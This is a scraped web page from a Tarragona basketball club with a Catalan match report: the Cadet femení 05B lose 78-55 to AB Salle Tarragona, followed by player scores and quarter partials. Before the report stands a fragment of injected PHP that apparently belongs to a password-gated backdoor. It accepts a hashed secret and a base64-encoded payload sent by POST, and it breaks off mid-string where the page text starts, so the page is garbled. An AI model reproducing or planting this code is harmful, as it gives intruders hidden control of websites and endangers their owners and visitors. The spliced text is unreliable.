function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet femení 05B perd contra un invicte AB Salle Tarragona- CBT (78-55) - Tgn Bàsquet Club -

El Cadet femení 05B perd contra un invicte AB Salle Tarragona- CBT (78-55)

Updated: maig 27, 2021

El Cadet femení 05B visita la pista d’un dels rivals més forts del seu grup, AB Salle Tarragona – CBT amb l’objectiu de competir al màxim, tal com ho ha estat demostrant fins ara. Les liles van iniciar el partit amb una ofensiva ordenada i efectiva, i amb molta solvència a l’hora de protegir la cistella. En la primera part del partit ja es va poder veure la intensitat que hi posaven els dos equips, plantejant una defensa pressionant tota la pista i jugant atacs de pocs minuts. Seria un matx molt igualat, arribant al descans amb un 39-35, que encara donava vida a les visitants. Va ser llavors, als darrers 7 minuts, on les grogues van demostrar la seva superioritat física, sent capaces d’aguantar el mateix ritme fins al xiulet final. Les d’Adam, faltes d’oxigen, no van poder refer-se, i un últim període de 26-11 acaba de sentenciar el matx.

AB SALLE TARRAGONA – CBT CFA2 – 78

CADET FEMENÍ 05B – 55

AB SALLE TARRAGONA – CBT CFA2: Plana (9), De Haro (6), Amela (3), Domínguez (2) i Baldira (19) –cinc inicial- Del Álamo (4), Serra (14), Bergada (9), Ñiño (12). 6/17 tirs lliures. 14 faltes.

CADET FEMENÍ 05B: Martorell (6), Galindo (13), Torrents, Morales (8) i Verge (13) –cinc inicial- Casado, Salvadó (2), Blasco (7) i Jaria (6). 4 triples: Blasco i Verge (3). 5/6 tirs lliures. 16 faltes.

Parcials: 22-19, 17-16, 13-9 i 26-11.

Àrbitre: Reina, S.